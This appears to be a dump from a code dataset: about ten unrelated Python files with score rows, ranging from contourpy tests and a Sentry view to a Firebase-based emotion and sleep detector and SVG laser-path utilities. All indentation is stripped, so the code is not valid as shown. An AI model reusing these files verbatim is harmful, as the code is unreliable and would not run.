{'map_id': 3, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+10_isr_456716_99+1626299263.3909254-24148+10', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254915, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412274}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 4, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+34_isr_407919_130+1626299263.3909254-24148+34', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254916, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412275}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 5, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+23_isr_254379_48+1626299263.3909254-24148+23', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254917, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412276}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 6, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+11_isr_37657_141+1626299263.3909254-24148+11', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254918, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412277}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 7, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+31_isr_226983_36+1626299263.3909254-24148+31', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254919, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412278}, 'transform_id': 2021, 'storage_id': None}]} # noqa E501
for coll_id in to_release_inputs:
contents = get_input_contents(request_id=to_release_inputs[coll_id][0]['request_id'],
coll_id=coll_id,
name=None)
print(len(contents))
in_dep_contents = []
for content in contents:
if (content['content_relation_type'] == ContentRelationType.InputDependency):
in_dep_contents.append(content)
print(len(in_dep_contents))
update_contents = release_inputs_by_collection(to_release_inputs)
print(update_contents)
update_contents = release_inputs_by_collection(to_release_inputs, final=True)
print(update_contents)
# release_inputs_test()
def show_works(req):
workflow = req['processing_metadata']['workflow']
print(workflow.independent_works)
print(len(workflow.independent_works))
print(workflow.works_template.keys())
print(len(workflow.works_template.keys()))
print(workflow.work_sequence.keys())
print(len(workflow.work_sequence.keys()))
print(workflow.works.keys())
print(len(workflow.works.keys()))
work_ids = []
for i_id in workflow.works:
work = workflow.works[i_id]
print(i_id)
print(work.work_name)
print(work.task_name)
print(work.work_id)
work_ids.append(work.work_id)
print(work_ids)
reqs = get_requests(request_id=229, with_detail=True, with_metadata=True)
for req in reqs:
# print(req['request_id'])
# print(rets)
# print(json_dumps(req, sort_keys=True, indent=4))
# show_works(req)
pass
# sys.exit(0)
"""
# reqs = get_requests()
# print(len(reqs))
for req in reqs:
if req['request_id'] == 113:
# print(req)
# print(req['request_metadata']['workflow'].to_dict())
# print(json_dumps(req, sort_keys=True, indent=4))
pass
sys.exit(0)
"""
tfs = get_transforms(request_id=230)
for tf in tfs:
# print(tf)
# print(tf['transform_metadata']['work'].to_dict())
print(json_dumps(tf, sort_keys=True, indent=4))
pass
sys.exit(0)
"""
msgs = retrieve_messages(workload_id=25972557)
number_contents = 0
for msg in msgs:
# if msg['msg_id'] in [323720]:
# if True:
# if msg['request_id'] in [208]:
print(json_dumps(msg['msg_content'], sort_keys=True, indent=4))
if msg['msg_content']['msg_type'] == 'file_stagein' and msg['msg_content']['relation_type'] == 'output':
# number_contents += len(msg['msg_content']['files'])
for i_file in msg['msg_content']['files']:
if i_file['status'] == 'Available':
number_contents += 1
pass
print(number_contents)
sys.exit(0)
"""
prs = get_processings(request_id=219)
i = 0
for pr in prs:
# if pr['request_id'] == 91:
print("processing_number: %s" % i)
i += 1
print(json_dumps(pr, sort_keys=True, indent=4))
pass
sys.exit(0)
to_release_inputs = [{'request_id': 248,
'coll_id': 3425,
'name': 'shared_pipecheck_20210407T110240Z.qgraph',
'status': ContentStatus.Available,
'substatus': ContentStatus.Available}]
# updated_contents = core_transforms.release_inputs(to_release_inputs)
# print(updated_contents)
| 1.695313 | 2 |
tests/test_config.py | contourpy/contourpy | 14 | 12786842 | from image_comparison import compare_images
import pytest
import util_config
import util_test
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_filled(name):
config = util_config.ConfigFilled(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_filled_quad_as_tri(name):
config = util_config.ConfigFilled(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_filled_corner(name):
config = util_config.ConfigFilledCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_corner.png", name)
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_lines(name):
if name == "mpl2005":
pytest.skip() # Line directions are not consistent.
config = util_config.ConfigLines(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_lines_quad_as_tri(name):
config = util_config.ConfigLines(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_lines_corner(name):
config = util_config.ConfigLinesCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_corner.png", name)
| 2.15625 | 2 |
src/sentry/web/frontend/organization_avatar.py | AlexWayfer/sentry | 4 | 12786843 | <gh_stars>1-10
from __future__ import absolute_import
from sentry.models import OrganizationAvatar
from sentry.web.frontend.base import AvatarPhotoView
class OrganizationAvatarPhotoView(AvatarPhotoView):
model = OrganizationAvatar
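# Presumably the base AvatarPhotoView implements fetching and serving the photo file;
# this subclass only binds it to the OrganizationAvatar model.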
| 1.390625 | 1 |
dronedirector/tests/test_aerial.py | avmarchenko/dronedirector | 0 | 12786844 | # -*- coding: utf-8 -*-
# Copyright 2018 <NAME>
# Distributed under the terms of the Apache License 2.0
"""
Test Aerial Objects
#####################
"""
import six
import json
import uuid
import numpy as np
from itertools import cycle
from dronedirector.aerial import AerialObject, Drone, SinusoidalDrone
class CaliRedwood(AerialObject):
"""Example of subclassing."""
def __init__(self):
super(CaliRedwood, self).__init__(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
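# The cycle(...) iterators above give each attribute an endless stream of the same
# reading, so this "tree" reports a fixed position on every message.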
def test_simple_aerial():
"""Test making a simple object on-the-fly."""
tree = AerialObject(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
msg = tree.message()
assert isinstance(msg, six.string_types)
assert isinstance(json.loads(msg), dict)
def test_subclassing_ao():
"""Test subclassing :class:`~dronedirector.aerial.AerialObject`."""
tree = CaliRedwood()
msg = json.loads(tree.message()) # Tests for valid json
assert isinstance(msg, dict)
assert np.isclose(msg['altitude'], 100.0)
def test_drone():
"""Test basic drone creation."""
uid = uuid.uuid4()
drone = Drone(cycle([1000.0]), cycle([41.0]), region="New York", uid=uid,
longitude=cycle(np.sin(np.arange(0, 2*np.pi, np.pi/360))))
assert drone.region == "New York"
assert drone.uid == uid
msg = json.loads(drone.message())
assert len(msg) == 6
| 2.8125 | 3 |
tests/factories/base.py | korostil/invest | 0 | 12786845 | import asyncio
import inspect
import factory
class AsyncFactory(factory.Factory):
"""
Copied from
https://github.com/FactoryBoy/factory_boy/issues/679#issuecomment-673960170
"""
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
async def maker_coroutine():
for key, value in kwargs.items():
# when using SubFactory, you'll have a Task in the corresponding kwarg
# await tasks to pass model instances instead
if inspect.isawaitable(value):
kwargs[key] = await value
# replace as needed by your way of creating model instances
document = model_class(*args, **kwargs)
await document.commit()
return document
# A Task can be awaited multiple times, unlike a coroutine.
# useful when a factory and a subfactory must share a same object
return asyncio.create_task(maker_coroutine())
@classmethod
async def create_batch(cls, size, **kwargs):
return [await cls.create(**kwargs) for _ in range(size)]
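# Hypothetical usage sketch (the Account model and its fields are assumptions, not
# part of this repository):
#
#   class AccountFactory(AsyncFactory):
#       class Meta:
#           model = Account
#
#       name = factory.Faker("name")
#
#   account = await AccountFactory()                # awaits the wrapped task
#   accounts = await AccountFactory.create_batch(3)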
class BaseFactory(factory.Factory):
class Meta:
abstract = True
| 2.984375 | 3 |
ML_Module_src/try_merge.py | Logi-Meichu/Eduction_anywhere | 0 | 12786846 | import os
import cv2
import time
import imutils
import pyrebase
import numpy as np
from utils import *
import sys
import dlib
from skimage import io
#################### Initialize ####################
print("Start initializing")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
emotion_dict = {0: "Angry", 1: "Disgusted", 2: "Fearful",
3: "Happy", 4: "Neutral", 5: "Sad", 6: "Surprised"}
firebase = init_firebase()
storage = firebase.storage()
db = firebase.database()
model, facecasc = init_model()
history_list = []
loop = 0
predictor_path = "./shape_predictor_68_face_landmarks.dat"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
reset_counter = 0
#################### Initialize ####################
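# Main loop (sketch of what follows): poll Firebase storage for new screenshots,
# run dlib landmark detection to estimate the eye aspect ratio (eyes treated as
# closed when the left/right average drops below 0.2), classify the cropped face
# with the emotion model loaded by init_model, and push the resulting label to the
# CUR_EMOTION node in the realtime database; a detected "sleeping" state overrides
# the emotion label. After 100 polls with no new screenshot the label resets to "None".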
print("Start looping")
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
while(1):
print("Loop ======================================================================", loop)
files = storage.list_files()
reset_counter += 1
for file in files:
if (file.name)[0] == "s" and file.name != "screenShot/":
if file.name not in history_list:
reset_counter = 0
history_list.append(file.name)
img_local_name = "imgs/" + os.path.basename(file.name) + ".png"
print(img_local_name)
storage.child(file.name).download(img_local_name)
gray_img = cv2.imread(
img_local_name, cv2.IMREAD_GRAYSCALE)
img = cv2.imread(img_local_name)
dets = detector(img, 1)
vec = np.empty([68, 2], dtype=int)
status = "Not Sleeping"
for k, d in enumerate(dets):
shape = predictor(img, d)
for b in range(68):
vec[b][0] = shape.part(b).x
vec[b][1] = shape.part(b).y
right_ear = compute_EAR(vec[42:48])
left_ear = compute_EAR(vec[36:42])
if (right_ear+left_ear)/2 < 0.2:
status = "sleeping"
print(status)
faces = facecasc.detectMultiScale(
gray_img, scaleFactor=1.3, minNeighbors=5)
for (x, y, w, h) in faces:
print("Detect Face")
roi_gray = gray_img[y:y + h, x:x + w]
cropped_img = np.expand_dims(np.expand_dims(
cv2.resize(roi_gray, (48, 48)), -1), 0)
prediction = model.predict(cropped_img)
maxindex = int(np.argmax(prediction))
if maxindex == 0 or maxindex == 1 or maxindex == 2 or maxindex == 4:
maxindex = 5
print(emotion_dict[maxindex])
if status == "sleeping":
data = {'cur_emotion': "sleeping"}
else:
data = {'cur_emotion': emotion_dict[maxindex]}
db.child("CUR_EMOTION").set(data)
if reset_counter >= 100:
reset_counter = 0
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
loop += 1
    # time.sleep(1)
| 2.1875 | 2 |
client/tools/buildtool/chameleon_tool/chameleon_copyr.py | uclouddotcn/chameleon | 4 | 12786847 | <reponame>uclouddotcn/chameleon
import os, shutil, sys, codecs
def isNewerThan(a, b):
return os.path.getmtime(a) > os.path.getmtime(b)
def genRFileForPkgName(genPath, pkgName, newPkgName):
s = pkgName.split('.')
d = os.path.join(*([genPath] + s))
src = os.path.join(d, 'R.java')
targetD = os.path.join(*([genPath] + newPkgName.split('.')))
target = os.path.join(targetD, 'R.java')
if not os.path.exists(src):
        raise IOError('Fail to locate old source %s' % src)
if not os.path.exists(targetD):
os.makedirs(targetD)
if not os.path.exists(target) or isNewerThan(src, target):
with codecs.open(src, 'r', 'utf8') as srcF, codecs.open(target, 'w', 'utf8') as targetF:
for l in srcF.readlines():
if l.startswith('package %s;' %pkgName):
targetF.write('package %s;\n' %newPkgName)
else:
targetF.write(l)
def main():
if len(sys.argv) < 4:
return -1
gendir = sys.argv[1]
origPkg = sys.argv[2]
nowPkg = sys.argv[3]
nowRFile = gendir + '/' + nowPkg.replace('.', '/') + '/R.java';
if not os.path.exists(nowRFile):
print >> sys.stderr, "can't find "+nowRFile
return -1
genRFileForPkgName(gendir, nowPkg, origPkg)
sys.exit(main())
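# Expected invocation (sketch -- the package names are made up for illustration):
#   python chameleon_copyr.py <gen_dir> com.example.app com.example.app.other
# where argv[1] is the gen directory, argv[2] the original package and argv[3] the
# current package whose generated R.java is copied into the original package's
# directory with its package statement rewritten.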
| 2.265625 | 2 |
flask_mrest/SupportUser.py | cindy-zimmerman/vmb-mrest | 0 | 12786848 | import os
import base64
from flask.ext.login import UserMixin
from flask.ext.login import AnonymousUserMixin as AnonymousUser
from flask.ext.bcrypt import Bcrypt, generate_password_hash
class User(UserMixin):
# proxy for a database of users
user_database = {"JohnDoe": ("JohnDoe", "John"),
"JaneDoe": ("JaneDoe", "Jane")
}
def __init__(self, uid, username, upload_inv):
self.id = uid
self.username = username
self.upload_inv = upload_inv
@classmethod
def get(cls,id):
return cls.user_database.get(id)
class Anonymous(AnonymousUser, dict):
def __init__(self):
super(Anonymous, self).__init__()
self.username = None
def __getattribute__(self, item):
if item in ['pw', 'password']:
raise AttributeError("Anonymous users have no '%s' attribute" % item)
else:
return super(Anonymous, self).__getattribute__(item)
def hasBankRights(self):
return False
def is_authenticated(self):
return False
def is_active(self):
return True
| 2.796875 | 3 |
test/input/099.py | EliRibble/pyfmt | 0 | 12786849 | <filename>test/input/099.py
def some_really_long_function_name(i):
return i ** i
print([(
some_really_long_function_name(i),
some_really_long_function_name(i+1),
some_really_long_function_name(i+3),
) for i in range(10)])
| 2.671875 | 3 |
laser_path_utils.py | mattvalentine/LaserAssistant | 2 | 12786850 | # laser_path_utils.py
"""Utility functions for working with paths for laser cutting"""
import numpy as np
import svgpathtools.svgpathtools as SVGPT
# it's important to clone and install the repo manually. The pip/pypi version is outdated
from laser_svg_utils import tree_to_tempfile
from laser_clipper import point_on_loops, point_inside_loop
def tempfile_to_paths(temp_svg):
"""open temp SVG file and return a path"""
# temp_svg.seek(0)
paths, attributes = SVGPT.svg2paths(temp_svg.name)
temp_svg.close()
return (paths, attributes)
def tree_to_paths(tree):
"""turns an svg tree into paths list"""
temp_svg = tree_to_tempfile(tree)
paths, _ = tempfile_to_paths(temp_svg)
svg_paths = []
    for path in paths:
        if path:  # keep only non-empty paths
            svg_paths.append(path.d())
return svg_paths
def paths_to_loops(paths):
    """Converts a list of path strings into a list of point loops"""
point_loop_list = []
for path_string in paths:
points = path_string_to_points(path_string)
if points is not None:
point_loop_list.append(points)
return point_loop_list
def combine_paths(paths, as_list=True):
    """combines path strings into one string, returned inside a single-element list unless as_list=False"""
combined = ""
first = True
for path in paths:
if not first:
combined += " "
combined += path
first = False
if as_list:
return [combined]
else:
return combined
def path_string_to_points(path_string):
"""Convert path string into a list of points"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return None
points = []
for segment in path:
segment_points = subpath_to_points(segment)
for point in segment_points:
if points == [] or point != points[-1]:
points.append(point)
return points
def subpath_to_points(segment):
"""Converts a path segment into a list of points"""
points = []
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
else:
points = points_from_curve(segment)
return points
def get_start(path_string):
"""returns start point (x, y) of a path string"""
path = SVGPT.parse_path(path_string)
start_xy = complex_to_xy(path.start)
return start_xy
def points_from_line(line):
"""returns endpoints of line"""
points_list = []
start = line.point(0)
end = line.point(1)
points_list.append(complex_to_xy(start))
points_list.append(complex_to_xy(end))
return points_list
def points_from_curve(curve, samples=20):
    """returns points sampled along a curve"""
points_list = []
for location in range(samples):
fraction = location / (samples-1)
point_on_curve = curve.point(fraction)
points_list.append(complex_to_xy(point_on_curve))
return points_list
def complex_to_xy(complex_point):
"""turns complex point (x+yj) into cartesian point [x,y]"""
xy_point = [complex_point.real, complex_point.imag]
return xy_point
def xy_to_complex(xy_point):
"""turns cartesian point [x,y] into complex point (x+yj)"""
complex_point = xy_point[0] + xy_point[1] * 1j
return complex_point
def loops_to_paths(loops):
"""turns a list of point loops into a list of path strings"""
paths = []
for loop in loops:
path = points_to_path(loop)
paths.append(path)
return paths
def points_to_path(points, closed=True):
"""turn a series of points into a path"""
first = True
data = "M "
for point in points:
if not first:
data += " L "
data += f"{point[0]},{point[1]}"
first = False
if closed:
data += " Z"
return data
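# Example (assumed coordinates): points_to_path([[0, 0], [10, 0], [10, 10]])
# returns "M 0,0 L 10,0 L 10,10 Z"; with closed=False the trailing " Z" is omitted.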
def scale_path(path_string, scale):
"""scales a path string by a scale factor (float)"""
path = SVGPT.parse_path(path_string)
scaled_path = path.scaled(scale)
new_path_string = scaled_path.d()
return new_path_string
def move_path(path_string, xy_translation):
"""Takes a path string and xy_translation (x, y), and moves it x units over, and y units down"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_translation = xy_to_complex(xy_translation)
translated_path = path.translated(complex_translation)
translated_string = translated_path.d()
return translated_string
def get_angle(path_string):
    """measures the angle of the path's start-to-end vector in degrees (CCW) from the positive X axis"""
path = SVGPT.parse_path(path_string)
vector = path.point(1) - path.point(0)
angle = np.angle(vector, deg=True)
return angle
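# Example: get_angle("M 0,0 L 1,1") measures the vector (1, 1) and returns 45.0;
# the angle is computed on the raw coordinates, ignoring SVG's y-down convention.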
def rotate_path(path_string, angle_degrees, xy_point):
"""rotates a path string a given number of degrees (CCW) around point (x, y)"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_point = xy_to_complex(xy_point)
rotated_path = path.rotated(angle_degrees, origin=complex_point)
rotated_string = rotated_path.d()
return rotated_string
def get_length(path_string):
"""returns the length of a path string"""
path = SVGPT.parse_path(path_string)
return path.length()
def get_all_segments(loops):
"""returns all of the segments from all of the loops"""
all_segments = []
for loop in loops:
loop_segments = get_loop_segments(loop)
all_segments = all_segments + loop_segments
return all_segments
def segments_overlap(first, second):
"""returns true if segments share more than a single point"""
first_path_string = points_to_path(first, closed=False)
second_path_string = points_to_path(second, closed=False)
first_path = SVGPT.parse_path(first_path_string)[0]
second_path = SVGPT.parse_path(second_path_string)[0]
overlaps = []
for point in first:
complex_point = xy_to_complex(point)
place_on_path = second_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
for point in second:
complex_point = xy_to_complex(point)
place_on_path = first_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
overlap = len(overlaps) >= 2
return overlap
def get_loop_segments(loop):
"""returns a list of segments in a loop"""
segments = []
last_point = None
for this_point in loop:
if last_point is not None:
new_segment = [last_point, this_point]
segments.append(new_segment)
last_point = this_point
return segments
def segments_to_paths(segments):
"""converts list of segments into list of paths"""
paths = []
for segment in segments:
new_path = points_to_path(segment, closed=False)
paths.append(new_path)
return paths
def get_not_overlapping(first, second):
"""returns the segments of the first path that do not overlap with the second."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
not_overlapping = ""
segment_started = False
last_point = loop[-1]
for point in loop:
if not point_on_loops(point, second_loops):
if not segment_started:
not_overlapping += f" M {last_point[0]},{last_point[1]}"
segment_started = True
if last_point != point:
not_overlapping += f" L {point[0]},{point[1]}"
else: # close the path
if segment_started:
not_overlapping += f" L {point[0]},{point[1]}"
output_paths.append(not_overlapping)
segment_started = False
not_overlapping = ""
last_point = point
if segment_started:
output_paths.append(not_overlapping)
return output_paths
def get_overlapping(first, second):
"""returns the overlapping segments of the first and second path."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
overlapping = ""
segment_started = False
for point in loop:
if point_on_loops(point, second_loops):
if not segment_started:
overlapping += f" M {point[0]},{point[1]}"
segment_started = True
else:
overlapping += f" L {point[0]},{point[1]}"
else: # skip other points
if segment_started:
output_paths.append(overlapping)
overlapping = ""
segment_started = False
if segment_started:
output_paths.append(overlapping)
return output_paths
def divide_pathstring_parts(pathstring):
    """breaks a single path string into substrings at each 'M', returning a list of path strings"""
substring = pathstring.strip()
paths = []
while 'M' in substring[1:]:
m_index = substring.find('M', 1)
if m_index > -1:
subpath = substring[0:m_index].strip()
paths.append(subpath)
substring = substring[m_index:].strip()
paths.append(substring)
return paths
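# Example: divide_pathstring_parts("M 0,0 L 1,1 M 2,2 L 3,3")
# returns ["M 0,0 L 1,1", "M 2,2 L 3,3"].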
# TODO: split open/closed separation into smaller chunks
def separate_closed_paths(paths):
    """takes a list of path strings,
    breaks non-continuous paths apart and
    joins connecting paths together,
    returning (closed_paths, open_paths)"""
discrete_paths = []
closed_paths = []
open_paths = []
dead_ends = []
for path in paths:
discrete_paths += divide_pathstring_parts(path)
for path in discrete_paths:
parsed_path = SVGPT.parse_path(path)
if parsed_path.isclosed():
closed_paths.append(path)
else:
open_paths.append(parsed_path)
while open_paths:
path = open_paths.pop()
new_path = None
for other_path in open_paths:
if path.end == other_path.start:
new_path = path.d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.end:
new_path = other_path.d() + " " + path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.end == other_path.end:
new_path = path.d() + " " + other_path.reversed().d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.start:
new_path = path.reversed().d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
if new_path is not None:
parsed_new_path = SVGPT.parse_path(new_path)
if parsed_new_path.isclosed():
closed_paths.append(new_path)
else:
open_paths.append(parsed_new_path)
else:
dead_ends.append(path.d())
open_paths = dead_ends
return closed_paths, open_paths
def is_inside(path, other_path):
"""checks if path is inside other_path and returns true or false"""
loop = paths_to_loops([path])[0]
other_loop = paths_to_loops([other_path])[0]
for point in loop:
if point_inside_loop(point, other_loop) == 1:
return True
return False
def path_to_segments(path_string):
"""breaks down a path into a list of segments"""
segments = []
path = SVGPT.parse_path(path_string)
for segment in path:
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
new_path_string = f"M {points[0][0]} {points[0][1]} L {points[1][0]} {points[1][1]}"
segments.append(new_path_string)
return segments
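# Example (float formatting approximate): path_to_segments("M 0,0 L 5,0 L 5,5")
# returns ["M 0.0 0.0 L 5.0 0.0", "M 5.0 0.0 L 5.0 5.0"], one single-line path per segment.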
| 2.90625 | 3 |